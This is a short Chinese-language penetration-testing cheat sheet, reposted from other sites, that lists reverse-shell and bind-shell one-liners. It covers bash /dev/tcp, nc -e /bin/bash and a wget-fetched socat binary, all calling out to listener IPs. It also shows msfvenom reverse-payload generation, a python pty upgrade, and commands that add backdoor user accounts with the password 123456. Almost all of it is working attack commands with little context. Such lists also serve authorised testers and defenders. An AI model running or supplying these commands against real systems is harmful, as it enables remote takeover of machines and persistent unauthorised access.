1 nc开启本地监听发布bash服务 1 # nc -lvvp 12345 -t -e /bin/bash 2 常用反弹shell一句话 (1) bash 反弹一句话 1 # bash -i >& /dev/tcp/192.168.1.123/12345 0>&1 (2) nc 反弹一句话 1 # nc 192.168.1.123 12345 -t -e /bin/bash (3) socat 反弹一句话 123 # wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat # 第一步:下载socat到/tmp目录下# chmod 755 /tmp/socat # 第二步:给socaat授予可以执行权限# /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.31.41:12345 # 第三步:反弹shell到目标主机的12345端口 3 利用msfvenom获取反弹一句话 (1) 查询 reverse payload 反弹路径 1 # msfvenom -l payloads 'cmd/unix/reverse' (2) 生成相关反弹一句话 1 # msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R 剩下的就是将生成的payload 反弹一句话直接复制到靶机上直接运行即反弹一个shell出来。 4 使用python获取标准shell 直接在获取的废标准shell上直接运行一下python 一句话即可获取一个标准的shell。 1 # python -c "import pty;pty.spawn('/bin/bash')" 5 linux 一句话添加账户 (1)chpasswd 方法 1 # useradd guest;echo 'guest:123456'|chpasswd (2)useradd -p 方法 1 # useradd -p `openssl passwd 123456` guest (3)echo -e 方法 1 # useradd test;echo -e "123456\n123456\n" |passwd test
【转】http://bobao.360.cn/learning/detail/4551.html
转载于:https://blog.51cto.com/duallay/1973123